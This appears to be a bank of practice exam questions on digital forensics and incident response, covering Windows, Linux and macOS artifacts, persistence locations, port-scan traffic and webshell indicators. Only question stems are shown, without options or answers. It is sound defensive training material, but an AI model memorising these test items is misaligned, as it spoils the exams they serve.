During a forensic examination of a Mac system, an investigator needs to recover a historical record of file system events, such as file modifications and deletions. Which artifact should they examine?

Question 201 • hard • multiple choice

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

Question 202 • medium • multi select

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Question 203 • hard • multi select

Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?

Question 204 • easy • multi select

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Question 205 • medium • multi select

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Question 206 • hard • multi select

Which THREE of the following are indicators of a webshell compromise on a web server?

Question 207 • medium • multi select

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Question 208 • medium • multi select

Which THREE of the following are commonly used network forensic data sources?

Question 209 • easy • multi select

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Question 210 • hard • multi select

Which THREE of the following are persistence mechanisms that can be used on Linux systems?

Question 211 • easy • multi select

A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?

Question 212 • medium • multi select

During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?

Question 213 • hard • multi select

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Question 214 • easy • multi select

During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?

Question 215 • medium • multi select

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Question 216 • hard • multi select

A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?
